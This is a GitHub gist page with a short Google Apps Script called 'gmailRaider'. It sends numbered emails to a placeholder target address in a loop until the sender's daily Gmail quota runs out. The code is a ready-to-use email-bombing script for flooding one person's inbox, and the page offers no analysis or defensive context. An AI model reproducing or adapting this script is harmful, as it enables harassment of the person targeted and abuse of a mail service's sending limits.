Skip to content

Instantly share code, notes, and snippets.

@kishaningithub
Created December 30, 2014 09:22
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save kishaningithub/715dd5498364c07289e9 to your computer and use it in GitHub Desktop.
Save kishaningithub/715dd5498364c07289e9 to your computer and use it in GitHub Desktop.
gmailRaider appscript
function gmailRaider() {
for(var i=0;MailApp.getRemainingDailyQuota()>0;i++){
MailApp.sendEmail('<<Target EmailId>>', 'yes'+(i+1) , 'Stinkie');
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment